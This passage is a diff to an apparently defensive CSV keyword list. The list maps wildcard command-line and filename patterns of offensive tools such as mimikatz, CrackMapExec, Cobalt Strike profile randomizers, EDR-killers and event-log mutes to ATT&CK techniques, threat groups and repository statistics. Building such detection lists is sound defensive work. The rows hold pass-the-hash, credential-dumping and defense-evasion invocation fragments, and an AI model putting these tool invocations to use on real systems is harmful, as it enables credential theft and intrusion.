TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe --wmi *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe* -d localhost * -u * -p */24*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*.exe* -f *.bin -t queueuserapc*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* --Filter *rule disable { condition: true }*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*.exe* -t queueuserapc*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" 
@@ -2355,23 +2355,23 @@ "*.exe* --technique queueuserapc*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* --technique remotethread*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*.exe* --technique selfthread*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","0","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" -"*.exe* -u administrator -H :*--shares*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*.exe* -u administrator -H :*--shares*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*.exe*\Terminator.sys*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" -"*.exec*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C4","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*.exec*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C4","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" "*.feeds.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.files.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 
- T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.forums.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.ftp.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*.get_c2profile*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*.get_c2profile*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*.go.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.groups.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike 
Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.help.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.imap.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.img.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of 
flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*.interactsh.com","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C7","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*.interactsh.com","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C7","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" "*.kb.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.kerberoast.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" 
-"*.kirbi *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*.kirbi *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*.ldapdump.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*.lists.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.live.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" 
@@ -2382,7 +2382,7 @@ "*.mobile.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.mysql.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
